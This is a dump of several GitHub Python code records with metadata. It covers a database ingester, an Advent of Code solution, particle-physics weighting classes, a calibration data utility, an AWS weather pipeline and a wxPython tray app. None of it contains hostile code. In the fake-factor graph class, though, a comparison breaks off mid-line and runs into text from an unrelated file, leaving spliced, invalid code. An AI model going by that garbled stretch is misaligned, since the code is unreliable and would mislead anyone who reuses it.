date_ctime = datetime.datetime.strptime(parsed_ctime, \"%a %b %d %H:%M:%S %Y\")\n # # print(date_ctime)\n # complete = os.path.join(path,i)\n # temp = pd.read_table(complete, sep=\"\\t\", low_memory=False)\n # df_dict.update({f\"df{count}\":temp})\n # count+=1\n\n # get date/time for modelrun\n file = os.path.join(path,i)\n created_time = os.path.getctime(file)\n parsed_ctime = time.ctime(created_time)\n date_ctime = datetime.datetime.strptime(parsed_ctime, \"%a %b %d %H:%M:%S %Y\")\n # get plotid\n plotid = i.split('_')[0]\n complete = os.path.join(path,i)\n temp = pd.read_table(complete, sep=\"\\t\", low_memory=False)\n temp['PlotId'] = plotid\n df_dict.update({f\"df{count}\":temp})\n # print(f\"{count} added\")\n count+=1\n else:\n pass\n return pd.concat([d[1] for d in df_dict.items()],ignore_index=True)\n\n\n\ndef model_run_updater(batchpath, modelrunkey, source = None):\n \"\"\"\n 1. creates a table in postgres with supplied dataframe\n 2. appends data to postgres table\n \"\"\"\n d = db(\"aero\")\n df = txt_read(batchpath)\n if source!=None:\n df['Source'] = source\n else:\n pass\n df['ModelRunKey'] = modelrunkey\n\n if tablecheck('aero_runs'):\n print('aero_runs exists, skipping table creation')\n update_model(batchpath,modelrunkey)\n\n ingesterv2.main_ingest(df, \"aero_runs\", d.str,100000)\n else:\n print('creating aero_runs table..')\n table_create(df, \"aero_runs\", \"aero\")\n update_model(batchpath,modelrunkey)\n ingesterv2.main_ingest(df, \"aero_runs\", d.str,100000)\n\n\ndef model_run_create():\n pass\n\ntype_translate = {np.dtype('int64'):'int',\n 'Int64':'int',\n np.dtype(\"object\"):'text',\n np.dtype('datetime64[ns]'):'timestamp',\n np.dtype('bool'):'boolean',\n np.dtype('float64'):'float(5)',}\n\nfields_dict = {\n\"ModelRunKey\":pd.Series([],dtype='object'),\n\"Model\":pd.Series([],dtype='object'),\n\"LocationType\":pd.Series([],dtype='object'),\n\"SurfaceSoilSource\":pd.Series([],dtype='datetime64[ns]'),\n\"MeteorologicalSource\":pd.Series([],dtype='object'),\n\"ModelRunNotes\":pd.Series([],dtype='object'),\n}\n", "repo_name": "krstphrrr/ingesterv2", "sub_path": "src/projects/aero/aero.py", "file_name": "aero.py", "file_ext": "py", "file_size_in_byte": 3744, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "os.listdir", "line_number": 33, "usage_type": "call"}, {"api_name": "os.path.splitext", "line_number": 35, "usage_type": "call"}, {"api_name": "os.path", "line_number": 35, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 49, "usage_type": "call"}, {"api_name": "os.path", "line_number": 49, "usage_type": "attribute"}, {"api_name": "os.path.getctime", "line_number": 50, "usage_type": "call"}, {"api_name": "os.path", "line_number": 50, "usage_type": "attribute"}, {"api_name": "time.ctime", "line_number": 51, "usage_type": "call"}, {"api_name": "datetime.datetime.strptime", "line_number": 52, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 52, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 55, "usage_type": "call"}, {"api_name": "os.path", "line_number": 55, "usage_type": "attribute"}, {"api_name": "pandas.read_table", "line_number": 56, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 63, "usage_type": "call"}, {"api_name": "src.utils.tools.db", "line_number": 72, "usage_type": "call"}, {"api_name": "src.projects.dima.tabletools.tablecheck", "line_number": 80, "usage_type": "call"}, {"api_name": "src.projects.aero.aero_model.update_model", "line_number": 82, "usage_type": "call"}, {"api_name": "src.projects.tall_tables.talltables_handler.ingesterv2.main_ingest", "line_number": 84, "usage_type": "call"}, {"api_name": "src.projects.tall_tables.talltables_handler.ingesterv2", "line_number": 84, "usage_type": "name"}, {"api_name": "src.projects.dima.tabletools.table_create", "line_number": 87, "usage_type": "call"}, {"api_name": "src.projects.aero.aero_model.update_model", "line_number": 88, "usage_type": "call"}, {"api_name": "src.projects.tall_tables.talltables_handler.ingesterv2.main_ingest", "line_number": 89, "usage_type": "call"}, {"api_name": "src.projects.tall_tables.talltables_handler.ingesterv2", "line_number": 89, "usage_type": "name"}, {"api_name": "numpy.dtype", "line_number": 95, "usage_type": "call"}, {"api_name": "numpy.dtype", "line_number": 97, "usage_type": "call"}, {"api_name": "numpy.dtype", "line_number": 98, "usage_type": "call"}, {"api_name": "numpy.dtype", "line_number": 99, "usage_type": "call"}, {"api_name": "numpy.dtype", "line_number": 100, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 103, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 104, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 105, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 106, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 107, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 108, "usage_type": "call"}]}
+{"seq_id": "1219552527", "text": "from queue import LifoQueue\nfrom typing import Dict, List, Tuple\n\nlines: List[str] = []\nwith open(\"input.txt\", mode=\"rt\") as inputfile:\n lines = [i.strip() for i in inputfile.readlines()]\n\nmatching: Dict[str, str] = {\"{\": \"}\", \"[\": \"]\", \"<\": \">\", \"(\": \")\"}\nillegal: Dict[str, int] = {\")\": 3, \"]\": 57, \"}\": 1197, \">\": 25137}\nsyntax_errors: List[Tuple[str, str, str]] = []\n\nillegal_sum: int = 0\nfor line_idx, line in enumerate(lines):\n q: LifoQueue[str] = LifoQueue()\n has_error: bool = False\n for c_idx, c in enumerate(line):\n if c in matching.keys():\n q.put_nowait(c)\n else:\n r = q.get_nowait()\n if c != matching[r]:\n has_error = True\n illegal_sum += illegal[c]\n se = (f\"SYNTAX ERROR [{line_idx}] at [{c_idx}]:\", f\"expected {matching[r]} but found {c} instead\", line)\n syntax_errors.append(se)\n\n # remaining_qsize = q.qsize()\n # remainder: str = \"\"\n # while True:\n # try:\n # remainder += q.get_nowait()\n # except Empty:\n # break\n # if not has_error:\n # print(f\"line [{line_idx}] has [{remaining_qsize}] elements remaining: {remainder}\")\n\nprint(illegal_sum)\n\nwith open(\"result.txt\", mode=\"wt\") as result:\n result.write(f\"syntax error score: {illegal_sum}\")\n\nwith open(\"output.txt\", mode=\"wt\") as outfile:\n for se in syntax_errors:\n outfile.write(\" \".join(se))\n outfile.write(\"\\n\")\n", "repo_name": "seldonPlan/advent_of_code", "sub_path": "2021/10/a/solution.py", "file_name": "solution.py", "file_ext": "py", "file_size_in_byte": 1474, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "typing.List", "line_number": 4, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 8, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 9, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 10, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 10, "usage_type": "name"}, {"api_name": "queue.LifoQueue", "line_number": 14, "usage_type": "name"}]}
+{"seq_id": "8994545692", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\nObjWeights.py: \nweights applied \nto single objects\n\"\"\"\n\n#import fnmatch\n#import os\n#import sys\nfrom math import sqrt\nfrom array import array\n# logging\nimport logging\nlog = logging.getLogger(__name__)\nlog.setLevel(logging.DEBUG)\n\n# ROOT\nimport ROOT\nimport metaroot\n\n# pyframe\nimport pyframe\n\n# pyutils\nimport rootutils\n\nimport mcutils\n\nGeV = 1000.0\n\n#------------------------------------------------------------------------------\nclass MuAllSF(pyframe.core.Algorithm):\n \"\"\"\n Single muon reco efficiency\n \"\"\"\n #__________________________________________________________________________\n def __init__(self, name=\"MuAllSF\",\n mu_index = None,\n #mu_level = None,\n key = None,\n scale = None,\n ):\n pyframe.core.Algorithm.__init__(self, name=name)\n self.mu_index = mu_index\n #self.mu_level = mu_level\n self.key = key\n self.scale = scale\n\n assert key, \"Must provide key for storing mu iso sf\"\n \n #_________________________________________________________________________\n def initialize(self): \n pass\n \"\"\"\n self.reco_levels = {\"Loose\":\"Loose\", \"Medium\":\"Loose\", \"Tight\":\"Loose\"}\n self.iso_levels = {\"Loose\":\"Loose\", \"Medium\":\"FixedCutLoose\", \"Tight\":\"FixedCutTightTrackOnly\"}\n self.ttva_levels = {\"Loose\": None, \"Medium\": None, \"Tight\": None}\n\n self.mu_levels = [\"Loose\", \"Medium\", \"Tight\"]\n if self.mu_level.startswith(\"Not\"):\n self.mu_levels.remove(self.mu_level.replace(\"Not\",\"\"))\n else:\n assert self.mu_level in self.mu_levels, \"ERROR: mu_level %s not recognised!!!\" % self.lead_mu_level\n self.mu_levels = [self.mu_level]\n \"\"\"\n \n #_________________________________________________________________________\n def execute(self, weight):\n sf=1.0\n if \"mc\" in self.sampletype: \n muons = self.store['muons']\n muon = muons[self.mu_index]\n \n if muon.isTruthMatchedToMuon:\n \n sf *= getattr(muon,\"_\".join([\"RecoEff\",\"SF\",\"Loose\"])).at(0)\n sf *= getattr(muon,\"_\".join([\"TTVAEff\",\"SF\"])).at(0)\n \n if getattr(muon,\"isIsolated_FixedCutTightTrackOnly\"):\n sf *= getattr(muon,\"_\".join([\"IsoEff\",\"SF\",\"FixedCutTightTrackOnly\"])).at(0)\n #elif getattr(muon,\"isIsolated_FixedCutLoose\"):\n # sf *= getattr(muon,\"_\".join([\"IsoEff\",\"SF\",\"FixedCutLoose\"])).at(0)\n elif getattr(muon,\"isIsolated_Loose\"):\n sf *= getattr(muon,\"_\".join([\"IsoEff\",\"SF\",\"Loose\"])).at(0)\n else: pass\n\n if self.scale: pass\n\n if self.key: \n self.store[self.key] = sf\n return True\n\n#------------------------------------------------------------------------------\nclass MuFakeFactorHist(pyframe.core.Algorithm):\n \"\"\"\n Applies the fake-factors to muon pairs\n \"\"\"\n #__________________________________________________________________________\n def __init__(self, name=\"MuFakeFactor\",config_file=None,mu_index=None,key=None,scale=None):\n pyframe.core.Algorithm.__init__(self,name=name)\n self.config_file = config_file\n self.mu_index = mu_index\n self.key = key\n self.scale = scale\n \n assert mu_index in [0,1], \"ERROR: mu_index must be in [0,1,2]\"\n assert config_file, \"Must provide config file!\"\n assert key, \"Must provide key for storing fakefactor\"\n #_________________________________________________________________________\n def initialize(self):\n f = ROOT.TFile.Open(self.config_file)\n assert f, \"Failed to open fake-factor config file: %s\"%(self.config_file)\n\n h_ff = f.Get(\"h_ff\")\n assert h_ff, \"Failed to get 'h_ff' from %s\"%(self.config_file)\n \n self.h_ff = h_ff.Clone()\n self.h_ff.SetDirectory(0)\n f.Close()\n #_________________________________________________________________________\n def execute(self, weight):\n muons = self.store['muons']\n mu = muons[self.mu_index]\n #if not self.sampletype == \"datadriven\": continue\n #if self.sampletype == \"mc\": continue\n pt_mu = mu.tlv.Pt()/GeV \n \n ff_mu = 1.0\n eff_mu = 0.0\n \n ibin_mu = self.h_ff.GetXaxis().FindBin(pt_mu) \n assert ibin_mu, \"ERROR: pt bin for lead mu not found!!!\"\n \n # error bars are symmetric\n #if self.mu_index == 0: \n # The previous line caused a bug in the \n # application of the fake-factors to the\n # validation region with di-muons triggers\n \n ff_mu = self.h_ff.GetBinContent(ibin_mu)\n eff_mu = self.h_ff.GetBinError(ibin_mu)\n \n if self.scale == 'up': \n ff_mu +=eff_mu\n if self.scale == 'dn': \n ff_mu -=eff_mu\n \n if self.key: \n self.store[self.key] = ff_mu\n\n return True\n\n#------------------------------------------------------------------------------\nclass MuFakeFactorGraph(pyframe.core.Algorithm):\n \"\"\"\n Applies the fake-factors to muon pairs\n \"\"\"\n #__________________________________________________________________________\n def __init__(self, name=\"MuFakeFactor\",config_file=None,mu_index=None,key=None,scale=None):\n pyframe.core.Algorithm.__init__(self,name=name)\n self.config_file = config_file\n self.mu_index = mu_index\n self.key = key\n self.scale = scale\n \n assert mu_index in [0,1], \"ERROR: mu_index must be in [0,1]\"\n assert config_file, \"Must provide config file!\"\n assert key, \"Must provide key for storing fakefactor\"\n #_________________________________________________________________________\n def initialize(self):\n f = ROOT.TFile.Open(self.config_file)\n assert f, \"Failed to open fake-factor config file: %s\"%(self.config_file)\n\n g_ff = f.Get(\"g_ff_stat_sys\")\n assert g_ff, \"Failed to get 'g_ff' from %s\"%(self.config_file)\n \n self.g_ff = g_ff.Clone()\n f.Close()\n #_________________________________________________________________________\n def execute(self, weight):\n muons = self.store['muons']\n mu = muons[self.mu_index]\n #if not self.sampletype == \"datadriven\": continue\n #if self.sampletype == \"mc\": continue\n pt_mu = mu.tlv.Pt()/GeV \n \n for ibin_mu in xrange(1,self.g_ff.GetN()):\n edlow = self.g_ff.GetX()[ibin_mu] - self.g_ff.GetEXlow()[ibin_mu]\n edhi = self.g_ff.GetX()[ibin_mu] + self.g_ff.GetEXhigh()[ibin_mu]\n if pt_mu>=edlow and pt_mu 0 else 1.25e-3))\n\ndef fill_zeros_previous(arr):\n for i, r in enumerate(arr):\n if r.sum() == 0 and i > 0:\n arr[i] = arr[i-1]\n return arr\n \ndef remove_zero_labels(x, y):\n y = y[np.all(y != 0, axis=1)]\n x = x[np.where(np.any(y != 0, axis=1))[0]]\n return x, y\n \ndef split_data(img_paths, labels, split=0.90, transform=None, non_zero_labels=1, remove_nans=1):\n labels = np.nan_to_num(labels)\n \n if non_zero_labels:\n if remove_nans:\n img_paths, labels = remove_zero_labels(img_paths, labels)\n else:\n labels = fill_zeros_previous(labels)\n \n x_train, x_test, y_train, y_test = train_test_split(img_paths, labels, test_size=(1.0 - split), random_state=42)\n train_size = int(split * x_train.shape[0])\n x_valid, y_valid, x_train, y_train = x_train[train_size:], y_train[train_size:], x_train[:train_size], y_train[:train_size]\n\n train_data = CalibData(x_train, y_train, transform=transform)\n valid_data = CalibData(x_valid, y_valid)\n test_data = CalibData(x_test, y_test)\n \n return train_data, valid_data, test_data\n\ndef load_pretrained_model(model, weights_path):\n model.load_state_dict(torch.load(weights_path))\n return model\n\n\n\n\n", "repo_name": "asceznyk/calipy", "sub_path": "utils.py", "file_name": "utils.py", "file_ext": "py", "file_size_in_byte": 3426, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "torch.device", "line_number": 15, "usage_type": "call"}, {"api_name": "torch.cuda.is_available", "line_number": 15, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 15, "usage_type": "attribute"}, {"api_name": "torch.utils.data.Dataset", "line_number": 17, "usage_type": "name"}, {"api_name": "torchvision.transforms.functional.resize", "line_number": 27, "usage_type": "call"}, {"api_name": "torchvision.transforms.functional", "line_number": 27, "usage_type": "name"}, {"api_name": "torchvision.transforms.functional.to_tensor", "line_number": 27, "usage_type": "call"}, {"api_name": "torch.from_numpy", "line_number": 28, "usage_type": "call"}, {"api_name": "torch.utils.data.Dataset", "line_number": 34, "usage_type": "name"}, {"api_name": "torch.zeros", "line_number": 36, "usage_type": "call"}, {"api_name": "torch.from_numpy", "line_number": 44, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 54, "usage_type": "call"}, {"api_name": "numpy.loadtxt", "line_number": 55, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 58, "usage_type": "call"}, {"api_name": "numpy.vstack", "line_number": 58, "usage_type": "call"}, {"api_name": "numpy.nan_to_num", "line_number": 61, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 62, "usage_type": "call"}, {"api_name": "numpy.nanmean", "line_number": 62, "usage_type": "call"}, {"api_name": "math.pi", "line_number": 65, "usage_type": "attribute"}, {"api_name": "numpy.zeros_like", "line_number": 73, "usage_type": "call"}, {"api_name": "numpy.all", "line_number": 84, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 85, "usage_type": "call"}, {"api_name": "numpy.any", "line_number": 85, "usage_type": "call"}, {"api_name": "numpy.nan_to_num", "line_number": 89, "usage_type": "call"}, {"api_name": "torch.load", "line_number": 108, "usage_type": "call"}]}
+{"seq_id": "22744948661", "text": "import click\nimport os\nimport time\nfrom decimal import Decimal\n\n# import watchtower\nimport datetime\nfrom src.common.common_helper import init_env, LOGGER, s3resource\nfrom src.common.Lineage import Lineage\nfrom src.creation.Creation import Creation\nfrom src.ingestion.Ingestion import Ingestion\nimport json\nfrom src.store.Store import Store\nfrom src.analize.Analize import Analize\n\n\ndef run_job_creation(aws_job_id: str, days) -> None:\n \"\"\"\n run the job ingestion process that access data from a weather API,\n insert it into a DynamoDB Database, and generate some queries\n over the data that are exported to a S3 bucket.\n\n aws_job_id: the job id to be executed\n days: the number of days of the data to be ingested from the weather API\n\n \"\"\"\n try:\n LOGGER.info(\"Creation Status Running\")\n start_time = datetime.datetime.now().time().strftime(\"%H:%M:%S\")\n with open(os.environ[\"ATTRIBUTES\"]) as json_attr:\n attr = json.load(json_attr)\n with open(os.environ[\"KEYSCHEMA\"]) as json_key_schema:\n key_schema = json.load(json_key_schema)\n with open(os.environ[\"PROVISION\"]) as json_provision:\n provisions = json.load(json_provision)\n create_table = Creation()\n\n create_table.process(\n table_name=os.environ[\"TABLE_LANDING\"],\n attributes=attr,\n schema=key_schema,\n provisions=provisions,\n )\n\n end_time = datetime.datetime.now().time().strftime(\"%H:%M:%S\")\n LOGGER.info(f\"CREATION FINISH SUCCESSFULLY AT {end_time}\")\n\n except Exception as e:\n LOGGER.info(\"Ingestion status Failed\")\n LOGGER.info(f\"{e}\")\n end_time = datetime.datetime.now().time().strftime(\"%H:%M:%S\")\n\n\ndef split_list(lst, n):\n for i in range(0, len(lst), n):\n yield lst[i : i + n]\n\n\ndef run_job_ingestion_process(aws_job_id: str, days) -> None:\n \"\"\"\n run the job ingestion process that access data from a weather API,\n insert it into a DynamoDB Database, and generate some queries\n over the data that are exported to a S3 bucket.\n\n aws_job_id: the job id to be executed\n days: the number of days of the data to be ingested from the weather API\n\n \"\"\"\n try:\n LOGGER.info(\"Ingestion Status Running\")\n start_time = datetime.datetime.now().time().strftime(\"%H:%M:%S\")\n ingestion = Ingestion()\n record_list, output_df = ingestion.process(days)\n chunk_list = list(split_list(record_list, 25))\n store_item = Store()\n for i, chunk in enumerate(chunk_list):\n store_item.store_transaction(\n item=chunk,\n job_id=aws_job_id + \"_\" + str(i),\n PK=\"timezoneloc\",\n table=os.environ[\"TABLE_LANDING\"],\n )\n analize = Analize()\n path = f\"s3://{os.environ['REFINED']+'/'+os.environ['PATH_01']+'/'}\"\n result_query = analize.process(\n df=output_df, sql_path=str(os.environ[\"QUERY_MAX_TEMP_LOC\"])\n )\n analize.export(\n df=result_query, s3=s3resource, path=path, partition_cols=[\"date\"]\n )\n result_query_02 = analize.process(\n df=output_df, sql_path=str(os.environ[\"QUERY_STATS_DAY\"])\n )\n path = f\"s3://{os.environ['REFINED']+'/'+os.environ['PATH_02']+'/'}\"\n analize.export(\n df=result_query_02,\n s3=s3resource,\n path=path,\n partition_cols=[\"locationtime\"],\n )\n end_time = datetime.datetime.now().time().strftime(\"%H:%M:%S\")\n LOGGER.info(f\"PROCESS END TO END FINISH SUCCESSFULLY AT {end_time}\")\n\n except Exception as e:\n LOGGER.info(\"END TO END status Failed\")\n LOGGER.error(f\"END TO END status Failed {e}\")\n LOGGER.info(f\"{e}\")\n end_time = datetime.datetime.now().time().strftime(\"%H:%M:%S\")\n\n\n@click.command()\n@click.option(\"--overwrite\", help=\"True, False\", required=False)\n@click.option(\"--days\", help=\"int value from 1 to n\", required=True)\n@click.option(\"--aws_job_id\", help=\"The current Job ID\")\n@click.option(\"--job\", help=\"creation_job, ingestion_process_job\", required=True)\n# @click.option(\"--job\", help=\"Job name \")\n\n\n@click.option(\n \"--env\",\n default=\"prod\",\n help=\"'dev' for development, 'prod' for production environment\",\n)\ndef main(job, overwrite, days, env, aws_job_id):\n start = time.time()\n # os.environ[\"OVERWRITE_DATA\"] = overwrite or \"False\"\n days = days or 5\n init_env(env)\n # Add Handler to cloudwatch logs\n # LOGGER.addHandler(\n # watchtower.CloudWatchLogHandler(log_group=os.environ[\"CLOUDWATCH_LOG_GROUP\"])\n # )\n LOGGER.info(f\"Job: {job} {aws_job_id}\")\n LOGGER.info(f\"Overwrite files: {overwrite}\")\n LOGGER.info(\"Execution Days: {0}\".format(days))\n jobname = \"-\".join([env, days, aws_job_id])\n os.environ[\"AWS_BATCH_JOB_ID\"] = aws_job_id\n LOGGER.info(f\"Starting a job: {jobname}\")\n # Start a job\n function_dict = {\n \"creation_job\": run_job_creation,\n \"ingestion_process_job\": run_job_ingestion_process,\n # \"processing_job\": run_job_processing,\n # \"analize_job\": run_job_analyzing,\n }\n # job_function = function_dict.get(\"creation_job\")\n # job_function(aws_job_id, days)\n job_function = function_dict.get(job)\n job_function(aws_job_id, days)\n\n\nif __name__ == \"__main__\":\n # allows to set the aws access key\n main(auto_envvar_prefix=\"X\")\n", "repo_name": "wilisumo/weather_data_pipeline", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 5460, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "src.common.common_helper.LOGGER.info", "line_number": 28, "usage_type": "call"}, {"api_name": "src.common.common_helper.LOGGER", "line_number": 28, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 29, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 29, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 30, "usage_type": "attribute"}, {"api_name": "json.load", "line_number": 31, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 32, "usage_type": "attribute"}, {"api_name": "json.load", "line_number": 33, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 34, "usage_type": "attribute"}, {"api_name": "json.load", "line_number": 35, "usage_type": "call"}, {"api_name": "src.creation.Creation.Creation", "line_number": 36, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 39, "usage_type": "attribute"}, {"api_name": "datetime.datetime.now", "line_number": 45, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 45, "usage_type": "attribute"}, {"api_name": "src.common.common_helper.LOGGER.info", "line_number": 46, "usage_type": "call"}, {"api_name": "src.common.common_helper.LOGGER", "line_number": 46, "usage_type": "name"}, {"api_name": "src.common.common_helper.LOGGER.info", "line_number": 49, "usage_type": "call"}, {"api_name": "src.common.common_helper.LOGGER", "line_number": 49, "usage_type": "name"}, {"api_name": "src.common.common_helper.LOGGER.info", "line_number": 50, "usage_type": "call"}, {"api_name": "src.common.common_helper.LOGGER", "line_number": 50, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 51, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 51, "usage_type": "attribute"}, {"api_name": "src.common.common_helper.LOGGER.info", "line_number": 70, "usage_type": "call"}, {"api_name": "src.common.common_helper.LOGGER", "line_number": 70, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 71, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 71, "usage_type": "attribute"}, {"api_name": "src.ingestion.Ingestion.Ingestion", "line_number": 72, "usage_type": "call"}, {"api_name": "src.store.Store.Store", "line_number": 75, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 81, "usage_type": "attribute"}, {"api_name": "src.analize.Analize.Analize", "line_number": 83, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 84, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 86, "usage_type": "attribute"}, {"api_name": "src.common.common_helper.s3resource", "line_number": 89, "usage_type": "name"}, {"api_name": "os.environ", "line_number": 92, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 94, "usage_type": "attribute"}, {"api_name": "src.common.common_helper.s3resource", "line_number": 97, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 101, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 101, "usage_type": "attribute"}, {"api_name": "src.common.common_helper.LOGGER.info", "line_number": 102, "usage_type": "call"}, {"api_name": "src.common.common_helper.LOGGER", "line_number": 102, "usage_type": "name"}, {"api_name": "src.common.common_helper.LOGGER.info", "line_number": 105, "usage_type": "call"}, {"api_name": "src.common.common_helper.LOGGER", "line_number": 105, "usage_type": "name"}, {"api_name": "src.common.common_helper.LOGGER.error", "line_number": 106, "usage_type": "call"}, {"api_name": "src.common.common_helper.LOGGER", "line_number": 106, "usage_type": "name"}, {"api_name": "src.common.common_helper.LOGGER.info", "line_number": 107, "usage_type": "call"}, {"api_name": "src.common.common_helper.LOGGER", "line_number": 107, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 108, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 108, "usage_type": "attribute"}, {"api_name": "time.time", "line_number": 125, "usage_type": "call"}, {"api_name": "src.common.common_helper.init_env", "line_number": 128, "usage_type": "call"}, {"api_name": "src.common.common_helper.LOGGER.info", "line_number": 133, "usage_type": "call"}, {"api_name": "src.common.common_helper.LOGGER", "line_number": 133, "usage_type": "name"}, {"api_name": "src.common.common_helper.LOGGER.info", "line_number": 134, "usage_type": "call"}, {"api_name": "src.common.common_helper.LOGGER", "line_number": 134, "usage_type": "name"}, {"api_name": "src.common.common_helper.LOGGER.info", "line_number": 135, "usage_type": "call"}, {"api_name": "src.common.common_helper.LOGGER", "line_number": 135, "usage_type": "name"}, {"api_name": "os.environ", "line_number": 137, "usage_type": "attribute"}, {"api_name": "src.common.common_helper.LOGGER.info", "line_number": 138, "usage_type": "call"}, {"api_name": "src.common.common_helper.LOGGER", "line_number": 138, "usage_type": "name"}, {"api_name": "click.command", "line_number": 111, "usage_type": "call"}, {"api_name": "click.option", "line_number": 112, "usage_type": "call"}, {"api_name": "click.option", "line_number": 113, "usage_type": "call"}, {"api_name": "click.option", "line_number": 114, "usage_type": "call"}, {"api_name": "click.option", "line_number": 115, "usage_type": "call"}, {"api_name": "click.option", "line_number": 119, "usage_type": "call"}]}
+{"seq_id": "29305710713", "text": "# Chapter 4: Containers and Advanced Controls\r\n# Recipe 8: Building a system tray application\r\n#\r\nimport urllib\r\nimport json\r\nimport wx\r\n\r\nID_GET_CITY = wx.NewId()\r\n\r\nclass WeatherTray(wx.TaskBarIcon):\r\n def __init__(self):\r\n super(WeatherTray, self).__init__()\r\n self.data = { 'desc' : \"Unknown\", 'temp' : \"??\" }\r\n self.UpdateData(\"London,UK\")\r\n self.Bind(wx.EVT_MENU, self.OnMenu)\r\n\r\n def UpdateData(self, city):\r\n src = \"http://api.openweathermap.org/data/2.5/weather?q=%s\"\r\n try:\r\n formatted = city.replace(' ', \"%20\")\r\n url = urllib.urlopen(src % formatted)\r\n j = json.load(url)\r\n\r\n weather = j['weather'][0]\r\n temp = j['main']['temp']\r\n self.data = dict()\r\n self.data['desc'] = weather['main']\r\n self.data['icon'] = weather['icon']\r\n c = float(temp) - 273.15\r\n self.data['temp'] = c\r\n \r\n self.city = city\r\n self.UpdateIcon()\r\n except:\r\n pass\r\n\r\n def UpdateIcon(self):\r\n img = None\r\n try:\r\n loc = \"http://openweathermap.org/img/w/%s.png\"\r\n url = urllib.urlopen(loc % self.data['icon'])\r\n img = wx.ImageFromStream(url, wx.BITMAP_TYPE_PNG)\r\n img = wx.BitmapFromImage(img)\r\n except:\r\n img = wx.Bitmap('errIcon.png')\r\n icon = wx.IconFromBitmap(img)\r\n self.SetIcon(icon)\r\n\r\n def CreatePopupMenu(self):\r\n menu = wx.Menu()\r\n \r\n data = (self.city, \r\n \"Weather: %s\" % self.data['desc'], \r\n \"Temp: %s C\" % self.data['temp'])\r\n for d in data:\r\n item = menu.Append(wx.ID_ANY, d)\r\n item.Enable(False)\r\n\r\n menu.AppendSeparator()\r\n menu.Append(ID_GET_CITY, \"Enter city name...\")\r\n menu.AppendSeparator()\r\n menu.Append(wx.ID_CLOSE)\r\n return menu\r\n\r\n def OnMenu(self, event):\r\n if event.Id == wx.ID_CLOSE:\r\n self.Destroy()\r\n elif event.Id == ID_GET_CITY:\r\n t = wx.GetTextFromUser(\"Enter City Name (City,Country):\", \r\n default_value=self.city)\r\n if t:\r\n self.UpdateData(t)\r\n else:\r\n event.Skip()\r\n\r\nclass WeatherTrayApp(wx.App):\r\n def OnInit(self):\r\n self._trayIcon = WeatherTray()\r\n return True\r\n\r\nif __name__ == \"__main__\":\r\n app = WeatherTrayApp(False)\r\n app.MainLoop()\r\n ", "repo_name": "cubu/wxPython-Application-Development-Cookbook", "sub_path": "Chapter 4/08/sysTrayApp.py", "file_name": "sysTrayApp.py", "file_ext": "py", "file_size_in_byte": 2525, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 3, "dataset": "github-code", "pt": "31", "api": [{"api_name": "wx.NewId", "line_number": 8, "usage_type": "call"}, {"api_name": "wx.TaskBarIcon", "line_number": 10, "usage_type": "attribute"}, {"api_name": "wx.EVT_MENU", "line_number": 15, "usage_type": "attribute"}, {"api_name": "urllib.urlopen", "line_number": 21, "usage_type": "call"}, {"api_name": "json.load", "line_number": 22, "usage_type": "call"}, {"api_name": "urllib.urlopen", "line_number": 41, "usage_type": "call"}, {"api_name": "wx.ImageFromStream", "line_number": 42, "usage_type": "call"}, {"api_name": "wx.BITMAP_TYPE_PNG", "line_number": 42, "usage_type": "attribute"}, {"api_name": "wx.BitmapFromImage", "line_number": 43, "usage_type": "call"}, {"api_name": "wx.Bitmap", "line_number": 45, "usage_type": "call"}, {"api_name": "wx.IconFromBitmap", "line_number": 46, "usage_type": "call"}, {"api_name": "wx.Menu", "line_number": 50, "usage_type": "call"}, {"api_name": "wx.ID_ANY", "line_number": 56, "usage_type": "attribute"}, {"api_name": "wx.ID_CLOSE", "line_number": 62, "usage_type": "attribute"}, {"api_name": "wx.ID_CLOSE", "line_number": 66, "usage_type": "attribute"}, {"api_name": "wx.GetTextFromUser", "line_number": 69, 